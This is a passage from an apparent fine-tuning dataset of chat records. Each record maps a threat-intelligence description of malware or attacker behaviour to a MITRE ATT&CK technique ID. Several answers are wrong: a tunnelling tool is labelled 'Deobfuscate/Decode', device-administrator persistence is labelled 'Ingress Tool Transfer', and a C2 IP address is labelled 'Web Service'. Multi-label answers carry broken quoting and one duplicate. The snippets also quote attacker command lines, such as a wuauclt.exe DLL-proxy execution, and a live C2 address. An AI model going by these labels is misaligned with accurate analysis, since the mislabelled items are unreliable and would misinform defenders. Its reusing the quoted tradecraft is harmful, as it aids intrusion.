an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During our investigation of one of the compromised servers we found an application that, at first glance, appeared to be a legitimate SSH server called Dropbear SSH" }, { "role": "assistant", "content": "T1036 - Masquerading', 'T1021 - Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Also, the x command will delete the generated registry key and the Office365DCOMCheck/SystemDiskClean scheduled task" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used AES to encrypt C2 responses." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KGH_SPY can send a file containing victim system information to C2." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The C2 domain used in this shellcode has been categorized as malware in DNS Security, URL Filtering and WildFire, which are security subscriptions for Next-Generation Firewall customers. App-ID, the traffic classification system in Next-Generation Firewalls, is capable of identifying applications irrespective of port, protocol, encryption (SSH or SSL) or any other evasive tactic used by the application. This shellcode attempts to communicate over TCP port 443 with traffic that does not conform to proper SSL or any other known application. As a matter of best practice, we advise customers to block unknown outbound TCP traffic in their security policies" }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Skidmap has the ability to install several loadable kernel modules (LKMs) on infected machines." }, { "role": "assistant", "content": "T1547.006 - Boot or Logon Autostart Execution: Kernel Modules and Extensions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent can identify the country code on a compromised host." }, { "role": "assistant", "content": "T1614 - System Location Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The lnk file (WindowsUpdateConf.lnk) executes “C:\\Windows\\system32\\wuauclt.exe” /UpdateDeploymentProvider C:\\Wíndows\\system32\\wuaueng.dll /RunHandlerComServer. This is an interesting technique used by Lazarus to run its malicious DLL using the Windows Update Client to bypass security detection mechanisms" }, { "role": "assistant", "content": "T1218 - Signed Binary Proxy Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Meteor can use `wmic.exe` as part of its effort to delete shadow copies." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pisloader has commands to list drives on the victim machine and to list file information for a given directory." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used different compromised credentials for remote access and to move laterally." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "checks the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings for proxy configurations information." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As soon as the user enabled the macro, a robust Visual Basic Application (VBA) script began to execute. First, it would query Windows Management Instrumentation (WMI) to check if any of the following applications were running" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has used MSI files to download additional files to execute." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar has used various Windows API functions on a victim's machine." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers also used a malicious tool that they named BCS-server. This tool allows them to open a tunnel into an internal network and then this tunnel can be used to send and receive data between the C&C server and even non-infected computers in the network. The main idea of this tool is based on the same principles as the XTUNNEL malware used by the Sednit group" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor can download additional plugins, updates and other files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The implant consists of a modified Cisco IOS image that allows the attacker to load different functional modules from the anonymity of the internet. Each of the modules are enabled via the HTTP protocol (not HTTPS), using a specifically crafted TCP packets sent to the routers interface. The packets have a nonstandard sequence and corresponding acknowledgment numbers. The modules can manifest themselves as independent executable code or hooks within the routers IOS that provide functionality similar to the backdoor password" }, { "role": "assistant", "content": "T1205 - Traffic Signaling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sowbug has used keylogging tools." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used \"reg query “HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default”\" on a victim to query the Registry." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla can gather credentials from a number of browsers." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has copied and installed tools for operations once in the victim environment." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FoggyWeb has been XOR-encoded." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NoComm – No command, which causes the script to keep sending POST requests. Base64 string – A module to execute. The module is encrypted with a simple substitution cipher and encoded in base64" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq uses svchost.exe to execute a malicious DLL included in a new service group." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "YAHOYAH uses HTTP GET requests to download other files that are executed in memory." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can move laterally using worm-like functionality through exploitation of SMB." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 used RDP to move laterally in victim networks." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can upload and download to and from a victim machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson RAT can steal credentials from browsers, collect antivirus information, capture screenshots, and list victim drives, processes, and directories. We have observed how an infected host communicates with a Crimson RAT C&C server to send exfiltrated information including PC name, operating system (OS) information, and the location of the Crimson RAT malware inside the system." }, { "role": "assistant", "content": "T1592 - Gather Victim Host Information', 'T1589 - Gather Victim Identity Information', 'T1590 - Gather Victim Network Information', 'T1125 - Video Capture', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1056 - Input Capture', 'T1113 - Screen Capture', 'T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KGH_SPY has the ability to set the \"HKCU\\Environment\\UserInitMprLogonScript\" Registry key to execute logon scripts." }, { "role": "assistant", "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkHydrus has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the “attachedTemplate” technique to load a template from a remote server." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can accept multiple URLs for C2 servers." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The configuration data used by the backdoor has the following structure: #pragma pack(push, 1) struct st_cncconfig { _WORD id; _BYTE byte2; _BYTE byte3; _QWORD pCnCBeg; _QWORD pCnCEnd; _QWORD pLastElement; }; #pragma pack(pop) To be able to enter the data into the database, Linux.BackDoor.Fysbis.1 converts the configuration data into the following structure: #pragma pack(push, 1) struct st_crypted_config_data { _WORD id; _BYTE byte2; _BYTE byte3; char* pCnC; }; #pragma pack(pop) Before the configuration data is encrypted with the RC4 algorithm, 11 signature bytes are added to the end of the data (11 bytes are stored in the backdoor's body)" }, { "role": "assistant", "content": "T1005 - Data from Local System', 'T1140 - Deobfuscate/Decode Files or Information', 'T1027.002 - Obfuscated Files or Information: Software Packing', 'T1041 - Exfiltration Over C2 Channel', 'T1560 - Archive Collected Data', 'T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used spearphishing emails to deliver BrainTest as a malicious attachment." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates to its C2 server over HTTP." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additional tools were recovered during the incident, including a network scanning/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as 'spwebmember'" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanHaiShu executes additional Jscript code on the victim's machine." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADNEWS creates a scheduled task to establish by executing a malicious payload every subsequent minute." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Azorult can collect host IP information from the victim’s machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chrommme can download its code from C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti Group used stolen certificates to sign its malware." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Javali can monitor processes for open browsers and custom banking applications." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One variant of BlackEnergy locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence." }, { "role": "assistant", "content": "T1574.010 - Services File Permissions Weakness" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chaes can download additional files onto an infected machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CreepyDrive can use OneDrive for C2." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gold Dragon collects endpoint information using the \"systeminfo\" command." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a sophisticated keylogger." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RobbinHood will search for Windows services that are associated with antivirus software on the system and kill the process." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "11 bytes of this buffer are encrypted with the XOR algorithm as follows: i = 0 while ( 1 ) { crypted_buffer = (_BYTE *)this_->crypted_buffer; if ( i gt;= this-gt;crypted_buffer_size - 4 ) // this-gt;crypted_buffer_size == 15 break; ++i; crypted_buffer[i + 4] ^= crypted_buffer[i & 3]; The generated buffer in encoded using the BASE64 alphabet, where the last two characters are replaced with “-” and “_”" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LitePower can use a PowerShell script to execute commands." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "’s Java payload is encrypted with AES." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The main infection vector for Poseidon is the use of spear-phishing emails including RTF/DOC files, usually with a human resources lure. Poseidon’s toolkit displays an awareness of many antivirus providers over the years, attempting to attack or spoof these processes as a means of self-defense for their infections" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used XOR with 0x90 to obfuscate its configuration file." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On February 12, 2018 at 16:45 (all times are in the organization’s local time), an email was sent to the organization advertising a job vacancy at an American global service provider. The email contained a malicious link to hxxp://mynetwork.ddns[DOT].net:880" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon creates a new service named “ntssrv” to execute the payload. Shamoon can also spread via PsExec." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obtained OS version and hardware configuration from a victim." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OnionDuke uses HTTP and HTTPS for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We found that a domain admin account was compromised and the Active Directory audit tool PingCastle was run. Using the domain admin, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders" }, { "role": "assistant", "content": "T1078.002 - Domain Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Backdoor.Oldrea can download additional modules from C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MoonWind installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DustySky collects information about running processes from victims." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA551 has distributed different families of malware, including Ursnif (Gozi/ISFB), Valak and IcedID. TA551 malspam spoofs legitimate email chains based on data retrieved from previously infected Windows hosts. This is a generic statement asking the recipient to open an attached ZIP archive using the supplied password. File names for the ZIP archives use the name of the company being spoofed in the email. For example, if the spoofed sender is someone@companyname.com, the ZIP attachment would be named companyname.zip. In 2020, we also started seeing emails with info.zip or request.zip as the attached ZIP archive names. These password-protected ZIP attachments contain a Word document with macros to install malware. File names for the extracted Word documents follow noticeable patterns that have evolved as this campaign has progressed. URLs generated by the associated Word macros also follow noticeable patterns that have also evolved as this campaign has progressed" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access." }, { "role": "assistant", "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MobileOrder starts by registering itself as device administrator so that a normal user cannot uninstall it by simply clicking “uninstall” in settings" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The final payload is a ZIP archive that is usually encrypted by the algorithm shown in Figure 8 and, in a significant number of cases, we saw it being password-protected as well" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "zwShell can modify the Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay implements a decentralized way of storing these artifacts among the victim’s file system by using inline hooks applied on two Windows API functions, WriteFile and CloseHandle" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WarzoneRAT can use PowerShell to download files and execute commands." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ruler can be used to automate the abuse of Outlook Rules, Forms, and Home Pages to establish persistence." }, { "role": "assistant", "content": "T1137 - Office Application Startup" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EXOTIC LILY has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kasidet has the ability to search for a given process name in processes currently running in the system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine: Deletes the LNK file from the startup directory" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has used Windows built-in tool `ntdsutil` to extract the Active Directory (AD) database." }, { "role": "assistant", "content": "T1003.003 - OS Credential Dumping: NTDS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TYPEFRAME has used ports 443, 8080, and 8443 with a FakeTLS method." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM has been delivered via spearphishing attachments disguised as PDF documents." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this case, we can see the binary installation path and local reconnaissance to determine which flavor of Linux the malware is running. This is followed by a number of Linux shell command style commands related to the malware establishing persistence" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server. However, we were unable to obtain any sample of the subsequent payloads for this malware" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and passwords." }, { "role": "assistant", "content": "T1110.001 - Brute Force: Password Guessing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 used RDP for lateral movement." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT can list and manage startup entries." }, { "role": "assistant", "content": "T1037.005 - Boot or Logon Initialization Scripts: Startup Items" } ] }, { "messages": [ { "role": "system", 